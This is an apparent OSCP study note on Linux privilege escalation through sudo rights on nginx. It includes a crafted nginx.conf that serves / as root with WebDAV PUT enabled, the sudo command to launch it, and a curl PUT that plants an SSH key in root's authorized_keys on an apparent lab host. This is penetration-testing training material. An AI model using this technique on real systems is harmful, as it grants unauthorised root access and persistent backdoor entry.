// notes/ PrivEsc — Linux
🐧
Nginx
Having sudo access to /usr/sbin/nginx we can web server as root as access the filesystem (read and write) using root privileges.
#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/nginx ↗Nginx
Having sudo access to /usr/sbin/nginx we can web server as root as access the filesystem (read and write) using root privileges.
<figure><img src="/files/wwcKFFUCBEguLDu3eoQu" alt=""><figcaption></figcaption></figure>{% hint style="info" %} Change the user in the nginx.conf file to root {% endhint %}
<figure><img src="/files/4sDwDMHPKqedC8JcdiDG" alt=""><figcaption></figcaption></figure>bash
$cat nginx.conf | grep -v '\#'|grep . > /tmp/nginx.confNew nginx.conf file
code
01user root;02worker_processes auto;03events {04 worker_connections 768;05}06http {07server {08 listen 1338;09 server_name localhost;10 root /;11 dav_methods PUT;12 autoindex on;13 14 }15}- user will be root
- the server will listen on 1338
- the directory will be /
- dav_methods allows us to use the PUT method to update files
- autoindex allows up to browse the filesystem
bash
$sudo /usr/sbin/nginx -c /tmp/nginx.confVisit http://<IP>:1338 and view filesystem using the root user
<figure><img src="/files/OHMV8xiiMKaB8IwpH7OE" alt=""><figcaption></figcaption></figure>Create add a new public key to roots authorized_keys file
code
01ssh-keygen02curl -X PUT http://10.10.11.243:1338/root/.ssh/authorized_keys -d 'public key'